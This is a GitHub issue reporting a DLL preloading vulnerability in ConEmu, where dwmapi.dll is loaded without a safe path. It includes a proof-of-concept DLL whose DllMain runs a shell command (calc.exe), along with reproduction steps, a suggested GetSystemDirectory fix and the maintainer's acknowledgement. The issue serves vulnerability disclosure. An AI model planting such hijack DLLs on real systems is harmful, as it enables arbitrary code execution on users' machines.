Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Attacker can execute arbitrary code execution using Dll Preloading Attack. #2556

Open
comalmot opened this issue Nov 22, 2023 · 1 comment
Open

Attacker can execute arbitrary code execution using Dll Preloading Attack. #2556

comalmot opened this issue Nov 22, 2023 · 1 comment

Comments

@comalmot
Copy link

Versions

ConEmu build: v23.07.24 x64 (Portable Version : ConEmuPack.230724.7z )
OS version: Windows 11 Pro x64 (Build 22621)
Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe

Problem description

When ComEmu64.exe is executed, CDwmHelper::InitDwm () Method is invoked. ( https://github.com/Maximus5/ConEmu/blob/master/src/ConEmu/DwmHelper.cpp )

and in this Method, when Loading dwmapi.dll, LoadLibrary Function has no flag to prevent DLL Preloading.

ConEmu/src/ConEmu/DwmHelper.cpp

Line 111 in 740b09c

mh_DwmApi = LoadLibrary(_T("dwmapi.dll")); 

        mh_DwmApi = LoadLibrary(_T("dwmapi.dll"));

so, attacker can moved to malicious dll file (filename is dwmapi.dll) in Directory where ConEmuPack installed, and can execute arbitrary code excution.

Steps to reproduce

  1. Generate Malicious DLL File :
#include "pch.h"
#include "framework.h"
#include <Windows.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        WinExec((LPSTR)"cmd.exe /c calc.exe", SW_SHOW);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

this code invoke calc.exe.

  1. put it down in directory ConEmuPack A is installed as dwmapi.dll

image

  1. Just Click ConEmu64.exe.

image

Actual results

ConEmu.exe and ConEmu64.exe must not effect DLL Preloading,

Expected results

ConEmu.exe and ConEmu64.exe is effected by DLL Preloading,

Additional files

PoC :
2023-11-22 23-40-42

How to Solve

https://support.microsoft.com/en-au/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1

we can use Absolute Path, and can use GetSystemDirectory() function to combine the System Directory path with the DLL file name(in this case, dwmapi.dll) to defend it.

Sorry for my Bad English 😢
@Maximus5
Copy link
Owner

Thank you for raising the issue. I'll address this problem ASAP

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@Maximus5 @comalmot